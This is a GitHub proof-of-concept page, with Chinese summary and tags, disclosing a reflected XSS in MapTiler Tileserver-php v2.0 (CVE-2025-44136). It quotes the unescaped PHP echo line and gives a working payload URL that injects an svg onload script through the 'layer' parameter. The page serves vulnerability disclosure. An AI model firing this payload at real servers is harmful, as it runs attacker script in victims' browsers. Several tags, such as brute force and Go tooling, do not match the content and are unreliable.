mheranco/CVE-2025-44136
GitHub: mheranco/CVE-2025-44136
针对 MapTiler Tileserver-php v2.0 中未经身份验证的反射型 XSS 漏洞(CVE-2025-44136)的概念验证,揭示了错误信息输出中未编码用户输入所导致的安全风险。
Stars: 0 | Forks: 0
# CVE-2025-44136
MapTiler Tileserver-php v2.0 中未经身份验证的 XSS 漏洞。
## 描述
MapTiler Tileserver-php v2.0 存在跨站脚本攻击 (XSS) 漏洞。GET 参数 "layer" 在错误信息中被原样输出,未经 HTML 编码。这导致了 XSS 漏洞,允许未经身份验证的攻击者在受害者的浏览器中执行任意的 HTML 或 JavaScript 代码。
https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L409
```
echo 'Server: Unknown or not specified dataset "' . $tileset . '"';
```
## PoC
http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e
## 贡献者
Martin Herancourt
标签:0day漏洞, CVE-2025-44136, Go语言工具, HTML注入, MapTiler Tileserver-php, PHP安全, PoC, Web安全, XSS, 反射型XSS, 开放策略代理, 情报收集, 暴力破解, 未授权攻击, 漏洞情报, 漏洞研究, 蓝队分析, 跨站脚本攻击, 输入验证缺失